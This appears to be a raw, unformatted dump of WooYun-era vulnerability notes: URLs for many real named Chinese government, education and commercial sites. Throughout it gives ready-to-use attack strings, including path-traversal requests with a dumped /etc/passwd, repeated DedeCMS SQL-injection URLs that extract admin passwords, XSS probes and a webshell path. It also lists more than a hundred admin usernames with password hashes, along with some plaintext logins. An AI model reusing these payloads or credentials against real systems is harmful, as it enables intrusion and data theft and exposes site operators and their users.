http://www.bestay.com.cn/Web/Member/OrderDetail.aspx?orderid=CC20140227006019 http://mis.jj-inn.com http://mis.jj-inn.com/jmx-console/ http://www.sxtarena.com/wwwroot.zip http://www1.jiande.gov.cn/web/CFCount/ http://www1.jiande.gov.cn/web/CFCount/Data/ http://www1.jiande.gov.cn/web/CFCount/Admin.asp http://www1.jiande.gov.cn/web/CFCount/CF_Admin_Manage.asp http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/5.html http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/ http://www1.jiande.gov.cn/web/CFCount/CounterPic/32/lpt1.config.asp http://www1.jiande.gov.cn/web/config.asp http://www.chsis.org/admin/ http://www.cailele.com/static/min?f=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.js root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System 
bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin terry:x:301:301::/home/terry:/bin/bash www:x:900:900::/www:/bin/bash cactiuser:x:901:901::/home/cactiuser:/bin/bash mfs:x:608:608::/home/mfs:/sbin/nologin oracle:x:175:115:Oracle Owner:/home/oracle:/bin/bash smolt:x:302:303:Smolt:/usr/share/smolt:/sbin/nologin http://www.hbgh.gov.cn/ http://10.B10.C200.D94:8080存在Jenkins的未授权访问,在脚本命令行处可以执行任意命令。 https://****.****.letv.cn:***** letv:TV*******)并登录 http://wooyun.org/bugs/wooyun-2013-039066 root:WJZX****** http://www.jiemeijie.com/public/db_backup/20140228025755.php/member/0.sql http://www.ygshangjie.com/ http://mall.heilanhome.com/mem_center/index/show_address&app_page=null&address_id=44320 http://www.ynxdfpr.com/ http://csxdf.com/ http://www.bjxdf.com/?baidu_pinpai http://www.jsxdf.com/ http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/shijuan/sjsearch.asp http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/admin/Admin_Login.asp http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/admin/ewebeditor/UploadFile/AspxSpy2014Final.aspx EMC-SNAS:T7.0.54.6 EMC-SNAS:T7.0.54.6 http://mmog.ourgame.com/存在SQL注入,能获得管理员和普通用户的用户名和密码,可能造成用户数据泄露,并面临被脱裤的危险。 http://w.game.tom.com/ http://support.ufida.com.cn/nmorenewslist10.asp?queryUser=a http://support.chanjet.com/getpwd/AjaxEvent.aspx?Event=GetEmail&value=admin%27 http://support.ufida.com.cn//kbm/kbmlist2.asp http://www.abingjs.com UserName:admin MD5:3e7a64d84683d218 http://www.sunnyi.cn UserName:kicshop7356 MD5:0d735d1d077e5e24 http://www.duhoo.net UserName:admin MD5:a7389ec9ad889c29 http://www.0731jkj.com UserName:xzs MD5:fcec6c9ff7085e39 http://www.dailysilver.org UserName:admin MD5:86c7fbcd6ecf5109 http://www.zgwhzsh.com UserName:yangyinghao1986 
MD5:6e15b19a4038f470 http://www.2h2d.com.tw UserName:xiangge MD5:b1827488e9f7eff2 http://www.mobage.tw UserName:admin MD5:96b405ddbdad8f74 http://www.emxinc.cn UserName:admin MD5:e18b5117f85a6346 http://www.sdjgj.gov.cn UserName:admin MD5:14d9995171425f42 http://www.makkee.com.hk UserName:admin MD5:7a57a5a743894a0e http://www.szgt.gov.cn UserName:admin MD5:b93a0dc3b77e2c3f http://www.tpdmacao.org UserName:admin MD5:6ea6b7fa02701b1e http://www.scncpa-l-tax.gov.cn UserName:admin MD5:14867e1ed882aac2 http://www.xjcare.com UserName:admin MD5:8bc0d65d453b6f23 http://www.p-expo.com UserName:zhsp MD5:1e1d244ffb13f2e6 http://www.jshuabo.com UserName:admin MD5:049c26fd1a481a7d http://www.tzfeilu.com UserName:tzgly MD5:7a57a5a743894a0e http://www.annoroad.com UserName:admin MD5:7136b455e18b5e2c http://www.jnwater.com.cn UserName:jnwater MD5:8e471f1a0b8440ad http://sdjn.evergrande.com UserName:admin MD5:3a416e73140f2d19 http://www.cbfq.cn UserName:admin MD5:f9b98be32100c3a1 http://bjuu.xdf.cn UserName:admin MD5:d2e917195d57a8b8 http://www.cautism.com UserName:kangda MD5:0e0b2e56dc5d5905 http://www.amt.com.cn UserName:admin MD5:ec411cb0044be977 http://www.d-heaven.com UserName:cmsadmin MD5:50ea5839b500fd74 http://nsca-shanghai.com.cn UserName:admin MD5:bc356ff2d42e0dcf http://www.zmnedu.com UserName:admin MD5:7925a2c5b49147ff http://www.cis-expo.com UserName:admin MD5:59c5e1d09a804986 http://www.zoyue.com UserName:chinawwhb MD5:df5ab255f3c91ae5 http://www.ugitc.com UserName:admin MD5:a7a0bd9ef71d8cf9 http://www.eb5yimin.com UserName:yimin MD5:12b0fa625f9c6733 http://www.gzptly.com UserName:cncolour MD5:4d7191e8c276e745 http://www.weilanshi.com UserName:admin MD5:571e55e4f3544600 http://www.jsjyha.com UserName:admin MD5:c10beb229a472662 http://www.the9edu.com UserName:admin MD5:b2b4dcab418c486b http://www.csc114.com UserName:admin MD5:fc74c3c9621715ba http://www.cnasthma.com UserName:nahan MD5:c831b04de153469d http://old.5tv.com.cn UserName:admin MD5:67ac90f8b98ab4b8 
http://www.fanstour.com UserName:zhf@ MD5:95de932938d9a947 http://www.yfzdc.com UserName:admin MD5:28c460b82f54fb43 http://www.astv.com.cn UserName:admin MD5:6901773399d581a7 http://www.ginzza.net UserName:teqhost MD5:9ebb052280d37ccd http://www.habc.org.cn UserName:habc MD5:469e80d32c0559f8 http://www.gdsme.org UserName:admin MD5:534232ee8a562849 http://www.bdwsj.gov.cn UserName:admin MD5:1456b237f44533a0 http://fzone.oushinet.com UserName:admin MD5:45e3f273326e4ea3 http://www.kidney-cares.org UserName:administrator MD5:3b407eafc243a082 http://www.dbond.net UserName:chuming MD5:6ba60d779d0aebbb http://www.hnsbxh.org UserName:abc MD5:5e55395d57dc3f8a http://www.imwchina.com UserName:admin MD5:d1e9b30508e63064 http://www.dgtoyota.com UserName:myadmin MD5:65914e6f8121f88c http://www.daojiayouxue.com UserName:admin MD5:b9a0f64d09f6ab68 http://www.yxlw.org UserName:cdgadmin MD5:d08214e252decf49 http://www.trust-trust.com UserName:stadmin1 MD5:79558095a64eb822 http://www.simon-sh.com UserName:webadmin MD5:e139be103324d04d http://www.forhead.org UserName:admin MD5:69b1e3ec2f699258 http://www.wssng.com UserName:admin MD5:bfb709dd58931f5f http://www.lzmcwx.com UserName:admin MD5:4b88cd2afde80fd2 http://www.hrzh.org UserName:admin MD5:ac8fc472994386de http://grandmarkrealty.net UserName:admin MD5:786624e951f4fcbf http://www.xbtcm.com UserName:admin MD5:9dc96c496966a7f6 http://pingnannews.com UserName:admin MD5:e2a900c259ab31e3 http://www.gzyjtoyota.com UserName:myadmin MD5:65914e6f8121f88c http://www.cchmis.cn UserName:CcadMaster MD5:568393db540b9ad1 http://www.xzxinli.com UserName:admin MD5:4b143e089e10b1ea http://www.uestcp.com.cn UserName:liujinsong MD5:a85340b1e913e0f7 http://www.hzxhly.gov.cn UserName:admin MD5:93e482461b714777 http://nkbayy.com UserName:admin MD5:029cf707939e886e http://www.yz918.com UserName:xtybfgu MD5:52376ea9c7864ec8 http://hee.ctgu.edu.cn UserName:admin MD5:2745542386421305 http://www.sygdw.com UserName:sygdw MD5:291c3bb684559dfd 
http://www.tongcard.net UserName:admin MD5:06150a04f5c163bb http://www.koons.com.cn UserName:admin MD5:3996abdb71e2b508 http://www.valveyoto.com UserName:admin MD5:c1f3a636c05f8257 http://www.rw-wine.com UserName:ruiwen_com2 MD5:891715ef8ceb1f7b http://lib.qionghai.gov.cn UserName:abc MD5:5e55395d57dc3f8a http://www.redbudgroup.org.cn UserName:redbud_admin MD5:33b34179526e12fa http://www.fiesta.com.hk UserName:admin MD5:204233f582152996 http://www.fzys120.com UserName:admin MD5:39ff38e667472281 http://www.duoge007.com UserName:duoge MD5:cd75f87177b6febe http://www.jssybz.com UserName:sydw MD5:7a57a5a743894a0e http://www.dianfei.org UserName:admin MD5:b4242280103410dd http://zjjzc.com UserName:zjjweb MD5:464f0b3d6e2efc34 http://www.013578.com UserName:JINCHENG MD5:72c1cef643c98e3a http://www.66663333.com UserName:admin MD5:a5c9293c54538f08 http://www.ka147.com UserName:admin MD5:11c605acc3884920 http://www.114228.com UserName:admin MD5:1fafc8de44826dcc http://www.zikaohn.com UserName:33739321 MD5:65065adf021239e3 http://www.syygyy.com UserName:cityroom MD5:9c9105140e72c7dd http://www.lzhxzx.net UserName:admin MD5:c768f674f3c92add http://www.yixtnb.com UserName:admin MD5:edbe6a86266db44f http://www.refeng.net UserName:papaya MD5:373f8e6fc6733f27 http://www.zaozhuangly.com UserName:admin MD5:49ba59abbe56e057 http://www.86123123.com UserName:admin MD5:17e72fccd326b99f http://www.zdhbo.com UserName:admin MD5:7652bd870b7cecb0 http://www.sccj6.com UserName:admin MD5:1a4224be9e6c0b72 http://www.yaosuanteng.com UserName:mafeng MD5:8bd3e402498dce41 http://www.086kqw.com UserName:admin MD5:5b16336c3d67ba49 http://www.yotolo.com UserName:tujyce MD5:03d53c9a2395b002 http://www.tmwh.com UserName:admin MD5:164dbb260505c63d http://www.goozjj.com UserName:admin MD5:b43a54b73b6a221f http://www.hyzhengxing.com UserName:admin MD5:e32ec5c3f5a117b4 http://www.bjbaoye.com UserName:byadmin MD5:3a2cd1a22cea1640 http://www.bjchmnw.com UserName:admin MD5:3bae929f37819e58 
http://www.biantawang.com UserName:mym MD5:f200218ff5285ab0 http://www.dgxxw.net UserName:hbpeixun MD5:576e62b2d91c7470 http://www.naisee.com UserName:cgaga MD5:3f1126d1e89c3eed http://dhaow.com UserName:admin MD5:7a57a5a743894a0e http://zuimeijia.com UserName:admin MD5:f615b40fd9022ef0 http://www.516diy.com UserName:zhoucheng MD5:c6139c908de4a604 http://www.gxbyby.com UserName:admin MD5:deef630e71f718d9 http://www.siyin123.com UserName:admin MD5:eb853cd377ff4934 http://www.yingqin.org UserName:yingwenhua MD5:49ba59abbe56e057 http://www.losewz.com UserName:admin MD5:13d2f30b108c3f8c http://www.021shangbiao.com UserName:admin MD5:5a55685595a72b2c http://www.xinkegbyy.com UserName:admin MD5:2ce4a75eb264485b http://www.sh414.com UserName:shenekin MD5:247c7fb160a440dd http://www.shiyoupeixun.com UserName:mqzhqf MD5:25c1daccb05322d6 http://www.hxxt.cn UserName:admin MD5:a24cfb649f754bb0 http://www.nm18.com UserName:apider MD5:4efe0b194e966523 http://www.tao1638.com UserName:admin MD5:7a57a5a743894a0e http://www.tailum.com UserName:admin MD5:ad961b25c9b37e7f http://www.tsgbyy.com UserName:admin MD5:49ba59abbe56e057 http://www.mydcj.com UserName:bianhy MD5:39576dd3c96ed626 http://www.120xd.com UserName:admin MD5:13955235245b2497 http://www.renliu365.com UserName:0779admin MD5:ade0ca12790eb95c http://www.028chuzhou.com UserName:admin MD5:f1ee5a1be7bb4fe8 http://www.tiandily.com UserName:tiandily2010 MD5:f5facda10893b2e2 http://www.zgditan.com UserName:admin MD5:f74ec646b7890896 http://cn.west.travel UserName:admin MD5:bfa64cbcea931592 http://www.5k58.com UserName:my_admin MD5:63d4b32999ceb403 http://www.ynguzhen.com UserName:admin MD5:da7de4810c96042f http://www.tjbfyy.com UserName:admin MD5:e338c11d91a56de5 http://www.17jzg.com UserName:admin MD5:3f53f9fc4e1b51ca http://www.catholic.cd UserName:admin MD5:335cc2acb8ce87fb http://www.ziweifu.com UserName:leadcom MD5:37a7ce29dc602a59 http://www.jpxf.com UserName:admin MD5:005bf9a430660367 http://www.dipujie.com 
UserName:admin MD5:7a57a5a743894a0e http://www.gk116.cn UserName:admin MD5:f920ca1c9f9a5ec8 http://www.hep6.com UserName:admin MD5:3075dcad135e26cd http://www.mbzhan.com UserName:admin MD5:affaa0cca5eecba7 http://www.jzmoban.com UserName:admin MD5:bc5d348b09b42fad http://www.bdfch.com UserName:admin MD5:a0f32b688a015346 http://www.5loveb.com UserName:admin MD5:b9f1e3d940d5aa12 http://www.youkeyou.com UserName:fanren MD5:b9e2e489de343173 http://www.sdzsxx.net UserName:admin MD5:9e2b8eae02a5606b http://www.119cumt.com UserName:admin MD5:b02759daf7814712 http://www.51ou.com UserName:adminsswqzxdede51oucom MD5:ad32fb0f66e2f3ad http://www.maomaome.com UserName:admin MD5:be27139e41c93cab http://news.xuejiqiao.com UserName:admin MD5:d94a6ea252fd0165 http://www.hxlaa.com UserName:xiao MD5:6b41eb2011dcf129 http://www.zz1x.com UserName:btao24 MD5:24656dcb484a04b2 http://www.525222.com UserName:lotus MD5:1c9b9131355627bc http://www.shouwutang.com UserName:admin MD5:4394dda586a2b734 http://202.196.33.231 UserName:yxz MD5:293f3c88011d98e6 http://www.qbzjw.org UserName:admin MD5:e2695f8bed7ea430 http://www.mtksj.com UserName:youzhibin MD5:9a3eecebbaee7162 http://www.ajzw.gov.cn UserName:admin MD5:0e1b2a7b1edad7bc http://www.hrbcct.com UserName:Fabu MD5:8a6107e9574674cc08dbe6b43b43 http://www.52bus.com UserName:admin MD5:9716bbd9f69b4582 http://www.robotain.com UserName:robotain MD5:dab90ff1f6b416f1 http://www.justds.com UserName:admin MD5:87561d5afa5ba709 http://www.cnyako.com UserName:didi8765 MD5:a7d6fe7baaff92f9 http://www.chromegame.org UserName:admin_Game@123 MD5:34471f652c9ef6bd http://www.tgindt.com UserName:admin MD5:fab11a8a46bc41a5 http://www.gzhifi.com UserName:admin MD5:c262973e4f9d8fbe http://www.chinajianyang.com UserName:admin MD5:be692a77e34d959c http://210.28.92.133/njsj/bbs/admin/index.jsp也没啥好说的,后台注入漏洞,直接'or http://bot.aili.com/?a=login&c=bot&m=login 
http://baike.qmango.com:8080/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post http://cwc.cumt.edu.cn/wsyy http://jcc.chd.edu.cn/wsyy/ http://baoxiao.icw.buaa.edu.cn/ http://202.201.0.241/yybz/default.aspx http://oa.cqmcd.com:8089/admin/MainPage.aspx地址。直接'or http://www.nan-gang.gov.cn/Manage/Log/List.aspx直接'or http://app.yesky.com/利用的网站程序DEDECMS存在一个已经被公开的SQL注入漏洞,能获得管理员和普通用户的用户名和密码,可能造成用户数据泄露,并面临被脱裤的危险。 http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId= http://club.suning.com/thread-2205295-7-1.html http://222.39.14.168/security/jtmain.aspx http://222.39.14.168/security/mainpage.aspx http://tregister.ufida.com.cn/Card.aspx http://ccidstudy.ccidnet.com/lib/cms/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://homemsg.focus.cn/msgview/804/287389011.html http://home.focus.cn/zxrj/diary.php?this_login_id=65482616 http://home.focus.cn/zxrj/diary_content.php?note_id=325178 http://home.focus.cn/zxrj/account.php?this_login_id=65482616 http://home.focus.cn/chanpinku/search.php?q=%3Csvg+onload%3Dalert%28%2Fsohu%2F%29%3E http://play.jb51.net http://www.maxen.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 
http://sc.wo.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://61.154.9.17/lxs_fs_index.asp直接 http://xmmyzm.300188.cn/admin/login.aspx http://eduadmin.open.com.cn/LearningCenter/noteService/OMSMessageAnalysisList.aspx?_SendType=1&_msgID=4376090&_Status=2 www.jtbdqn.com http://sn.189.cn/service/pay/fluxcard.action?tab=buyFluxCard http://jx.china.com.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://www.eboss.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://v5mall.v5shop.com.cn/做测试,官方测试账号admin密码123456(不是管理员权限,老大重新注册个也可以) http://v5mall.v5shop.com.cn/Product.aspx?id=758 http://v5mall.v5shop.com.cn/Member/UpdateOrderPrice.ashx?oid=140110185071685339&pid=758&op=360.00 https://www.cmi.chinamobile.com//CPortal/images/go.Htm?i=/z21x/25P http://ecmall/admin/index.php?app=widget&act=edit&name=notice&file=script http://www.2cto.com/Article/201306/217250.html http://ecmall/external/widgets/notice/main.widget.php http://tantan.kankan.com/wp-admin http://v5mall.v5shop.com.cn http://v5mall.v5shop.com.cn/member/V5Mall_UserAddress_Operate.aspx?id=121 http://wyxy4.yzu.edu.cn/jpkc/report.asp?de1a02c863d2db58366dd53255c1dd8f 
http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick存在post型sql注入漏洞 AmwayServices.asmx/PvAddClick www.amway.com.cn http://www.amway.com.cn http://url.blog.51cto.com/user_index.php?action=delarticle display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://www.ah-seo.net http://218.16.245.35:8088/tj/syspurview/login.do?action=logininit http://www.csh.edu.cn/MOETC/login/loginAction!getAllSchool.action http://kids.anta.com/ http://kids.anta.com/callback.php http://kids.anta.com/phpmyadmin/index.php https://zjjcy.gov.cn wooyunyana:123456 wooyunyana:194383 http://www.bestay.com.cn/Web/Chain/HotelComment.aspx?unitId=8097&cityId= http://www.magnotel.com/Inn/chains.aspx?&UnitID=088 http://m.vip.com/index.php?m=special&v=touch&p=/../../../../../etc/passwd http://www.cailele.com/uc/safeCenter.php?action=updateMobileSave display:none!important;display:block;width=0;height=0 http://cn.bing.com/search?q=site%3Asto.cn+login&go=&qs=n&form=QBLH&pq=site%3Asto.cn+login&sc=0-0&sp=-1&sk= http://116.228.73.38:8008 http://golf.cctv.com/ http://golf.cctv.com/e/extend/dc_list.php?key= http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= http://golf.cctv.com/e/extend/court/court_detail.php?courtid=131&hole=1#hole_data http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= http://111.1.33.30:8080/index.aspx http://www.wfdedu.gov.cn/index.html events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1 http://mobsupport.zte.com.cn/ http://mobsupport.zte.com.cn/admin/ http://tianqi.114la.com/?539d4da574b83345996ab341a109321f=845%20AND%203*2*1=6%20AND%2062=62 http://ce.atlenovo.com/ams/view.php?id=15 http://youxue.xdf.cn http://m.youxue.xdf.cn/line/index?DictionaryId=2 http://m.youxue.xdf.cn/line/index?CountryId=39c998fb-3c60-8e8c-4a92-416f159deb58 
http://m.youxue.xdf.cn/diary/index?lineid=ae3050bf-4a0d-a3a4-4dfe-ade72ac11b26 http://m.youxue.xdf.cn/pic/index?lineid=ae3050bf-4a0d-a3a4-4dfe-ade72ac11b26 http://m.cztv.com//mobiletv/login.php http://www.yhfg.gov.cn/ http://www.yhjt.gov.cn/ http://www.hzyhldbz.gov.cn/ http://www.yhjsj.gov.cn/ http://www.yhdj.gov.cn/ http://yggc.yhlz.gov.cn/ http://www.yhls.gov.cn/ http://www.zjfuture.gov.cn/ http://www.yhtyzx.gov.cn/ http://wsj.yuhang.gov.cn/ http://www.yhjtjt.com/ http://www.yhland.gov.cn/ http://www.yhsjj.gov.cn/ http://www.zjgia.org.cn/ http://www.yhgcc.com http://www.hitcc.cn/ http://www.yhlpsy.com/ http://www.yhsqxy.com/ http://www.dabongtech.com/ http://www.yhgh.org/ http://www.hztxsx.com/ http://www.yhlz.gov.cn/ http://www.yhfg.gov.cn/ http://www.yhfg.gov.cn/messages_detail.aspx http://www.yhfg.gov.cn/list.aspx http://www.yhfg.gov.cn/messages.aspx?classid=5 http://www.yhjt.gov.cn/ http://www.yhjt.gov.cn/sltszt/pic.aspx?classid=107 http://www.yhjt.gov.cn/sltszt/news.aspx?classid=105 http://www.hzyhldbz.gov.cn/ http://www.hzyhldbz.gov.cn/sun_more.aspx?classid=434&item=0 http://www.hzyhldbz.gov.cn/search.aspx http://www.yhjsj.gov.cn/ http://www.yhjsj.gov.cn/newsshow-pic.asp?id=123 http://www.yhjsj.gov.cn/info.asp?id=4 http://www.yhjsj.gov.cn/city.asp?id=234 http://www.yhjsj.gov.cn/newsshow.asp?ID=6601 http://www.yhjsj.gov.cn/gsl.asp?id=339&lid=5 www.piao.com.cn http://www.piao.com.cn/public/tongji/search/piao.asp?itype=4 site:saicgroup.com,可以发现大量二级域名为博彩站点。 http://www.xygy.gov.cn/admin/Signin.aspx?returnURL=%2fadmin.aspx http://dwrh.net/ http://www.cpweb.gov.cn/ http://www.baidu.com/ulink?url=http://www.wooyun.org http://www.btdhlz.gov.cn/admin/login.aspx http://www.cpecartoon.com/cn/index.html http://www.sd.chinaunicom.com/index.html http://www.letushuo.com/index.php?app=tuan&cateid=3’ http://dazhe.byecity.com/ajax/ajaxurl.aspx http://dazhe.byecity.com/ajax/ajaxurl.aspx?action=city&province=12 http://zxxxj.tj.edu.cn/uids/login!login.action 
http://dzda.e21.edu.cn/ http://dzda.e21.edu.cn/dzda/login.php http://dzda.e21.edu.cn/dzda/e21web/xjgl_dzzw/xsxj.php这里可以绕过 http://www.shsic.org.cn/ http://www.dghui.com/register.action http://www.dghui.com/register.action http://scc2014.hnu.edu.cn http://ec.xcloudz.com/ecommerce/selfservice.action https://uc.xcloudz.com/ucenter/subscriber.action http://kefu.linekong.com/eService/system/inputLogin.do http://passport.linekong.com/invoker/JMXInvokerServlet http://kefu.linekong.com/eService/js/ http://ss.linekong.com/activity/shounvlang/girlinfo.php?girlid=13 http://yb.linekong.com/upload.php,抓包修改1.jpg为1.php,经测试可以上传成功,只是一下没找到上传路径 http://www.zj56.com.cn:8080/zj56/findkuaidi.action http://www.chinaiiss.com/ http://www.magnotel.com/ http://www.magnotel.com/Inn/chains.aspx?&UnitID=9013&CityID= http://220.196.57.147:8080/ http://220.196.57.147:8080/ http://xj.vae.ha.cn/1/index.html http://xj.vae.ha.cn/1/jyb/login.jsp http://xj.vae.ha.cn/1/sjleader/login.jsp http://xj.vae.ha.cn/1/bl/login.jsp http://xj.vae.ha.cn/1/sj/login.jsp http://xj.vae.ha.cn/1/sx/login.jsp http://xj.vae.ha.cn/1/xx/login.jsp http://xj.vae.ha.cn/1/xlrz/login.jsp http://passport.aedu.cn/api/getlogin?callback=jQuery191045942397392354906_1393519178458&uid=admin&pwd=admin&_=1393519178461 http://passport.aedu.cn/api/getlogin?uid=admin&pwd=admin http://news.gbicom.cn/gbicom/login.php http://www.ciprun.com/admin/privilege.php http://www.ciprun.com/help1.php?id=62 Url:http://www.bestay.com.cn/Web/Reservation/Destine2.aspx?uid=8106&rid=0002&RmNum=1&bt=2014-03-02&et=2014-03-03 Url:http://www.bestay.com.cn/Web/Reservation/Select.aspx?city=%E5%A4%A9%E6%B4%A5%E5%B8%82&citycode=1200&key=%E5%9F%8E%E5%B8%82/%E5%BA%97%E5%90%8D/%E5%9C%B0%E6%A0%87/%E8%A1%97%E9%81%93/%E6%99%AF%E7%82%B9&room=1&intime=2014-03-02&outtime=2014-03-03&storename=%E7%99%BE%E6%97%B6%E5%BF%AB%E6%8D%B7%E5%A4%A9%E6%B4%A5%E7%8E%8B%E9%A1%B6%E5%A0%A4%E5%9C%B0%E9%93%81%E7%AB%99%E5%BA%97&htlcd=8106 
http://ss.linekong.com/game_datum/freshman/novice.php?sort_id=154 http://movie.douban.com/subject/1793929/questions/1680/?from=question_hot_all Url:http://218.75.75.92/user_space.php?username=admin http://rx.8864.com/imagelist.php?sort_id=87 http://www.gzgwbn.net.cn/yyt/index.php?m=content&c=index&a=lists&catid=15 http://www.sjz10000.com/ http://www.weimob.com/crossdomain.xml http://yy.teatree.cn/vip/ http://bbs.peaksport.com/XP001-Forum-Team/Initial.html http://www.ceeg.cn:80/inc/newsfeeds.php?lang=1 http://luntan.yhd.com/forum.php?mod=viewthread&tid=653&extra=page%3D1 http://www.cdgdc.edu.cn/tdxlsqxt/stuPassword.html http://bobo.cztv.com/admin.php http://bobo.cztv.com/shell.php http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml inurl:datacenter http://www.zgc3x.com/jw/student/getfile.do?id= http://1.202.236.46/jw/student/getfile.do?id= http://www.ajzw.gov.cn/ http://madmin.7k7k.com/sys/login.php?cmd=form http://122.11.52.245:8080/script http://www.nju.gov.cn:8080 http://server.zdnet.com.cn/files/search.php?subclass=506%20and%201=2%20union%20select%201,user%28%29,database%28%29,4,5--&t=9 http://ec.zdnet.com.cn/files/searchs.php?date=201301&subclass=609%20and%201=2%20union%20select%201,user%28%29,3,database%28%29,5-- http://e.xbwl.cn/queryWind!queryPrice.action http://www.csxedu.net/system‎作为测试 url:http://www.csxedu.net/register.htm http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048791207.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789951391.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789943144.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116582789923851.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048779464.txt http://pub.jian.gov.cn/bmgkxx/dzb/gzdt/gggs/201401/P020140116571048796252.txt http://webmail.jx.chinamobile.com/portal/ http://www.hzfc.gov.cn/UserFiles/File/news/yiban.txt http://www.hzfc.gov.cn/UserFiles/File/news/yiban.txt 
